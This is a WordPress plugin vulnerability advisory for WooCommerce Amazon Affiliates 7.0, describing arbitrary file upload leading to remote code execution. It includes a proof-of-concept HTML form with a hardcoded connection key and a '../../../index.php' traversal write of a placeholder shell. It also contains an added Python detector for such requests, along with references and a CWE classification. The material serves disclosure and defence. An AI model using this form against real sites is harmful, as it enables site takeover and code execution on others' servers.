WooCommerce Amazon Affiliates - Arbitrary File Upload



Description
This plugin is vulnerable to Local File Disclosure and Remote Code Execution via Arbitrary File Upload.

Version tested: 7.0

Proof of Concept
<form action="http://wordpress/wp-content/plugins/wwc-amz-aff/modules/remote_support/remote_tunnel.php" method="post" >
	<input type="hidden" name="connection_key" value="69efc4922575861f31125878597e97cf" >
	<input name="action" value="save_file" ><br>
	<input name="file" value="../../../index.php"><br>
	<textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
	<input type="submit" ><br>
</form>
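
A defender-side check for the request shown in the proof of concept, added here as an example that is not part of the original advisory or the plugin's code: it inspects a logged HTTP request (for example from a WAF or reverse-proxy audit log that records form bodies) and flags `save_file` writes through `remote_tunnel.php` that leave the module directory or target a server-executable file. The function name, the sample requests, the extension list and the assumption that `file` is resolved relative to the script's directory are illustrative.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Endpoint path and parameter names are taken from the proof of concept above.
TUNNEL_SUFFIX = "/wp-content/plugins/wwc-amz-aff/modules/remote_support/remote_tunnel.php"
EXEC_EXTENSIONS = (".php", ".phtml", ".phar")  # assumption: types the server executes


def inspect_request(method, url, body):
    """Return a list of findings for one HTTP request (empty list = not flagged)."""
    path = urlsplit(url).path
    if not path.endswith(TUNNEL_SUFFIX):  # also matches installs in a subdirectory
        return []
    findings = ["request to remote_tunnel.php"]
    if method.upper() != "POST":
        return findings
    form = parse_qs(body, keep_blank_values=True)  # percent-decodes the values
    action = form.get("action", [""])[0]
    target = form.get("file", [""])[0].replace("\\", "/")
    if action == "save_file":
        findings.append("save_file action")
        # Assumption: "file" is resolved relative to the script's own directory.
        base = posixpath.dirname(path)
        resolved = posixpath.normpath(posixpath.join(base, target))
        if not resolved.startswith(base + "/"):
            findings.append("write escapes module directory: " + resolved)
        if resolved.lower().endswith(EXEC_EXTENSIONS):
            findings.append("target is server-executable")
    return findings


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "http://wordpress" + TUNNEL_SUFFIX,
     "connection_key=CONSTRUCTED&action=save_file"
     "&file=..%2F..%2F..%2Findex.php&file_content=Q09OU1RSVUNURUQ%3D"),
    ("POST", "http://wordpress" + TUNNEL_SUFFIX,
     "connection_key=CONSTRUCTED&action=save_file&file=notes.txt&file_content="),
    ("GET", "http://wordpress/index.php", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, urlsplit(url).path, "->", inspect_request(method, url, body))
```

Because the advisory lists no known fix, any hit on this endpoint is worth reviewing even when the traversal and extension checks do not fire.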

Affects Plugin

no known fix

References

PacketStorm 131629
URL https://web.archive.org/web/20150912142022/https://research.evex.pw/?vuln=13
URL https://codecanyon.net/item/woocommerce-amazon-affiliates-wordpress-plugin/3057503
URL https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_woocommerce_file_upload.rb

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 7520
Verified No
WPVDB ID 7940

Timeline

Publicly Published 2015-04-25 (about 5 years ago)
Added 2015-04-26 (about 5 years ago)
Last Updated 2019-10-23 (9 months ago)
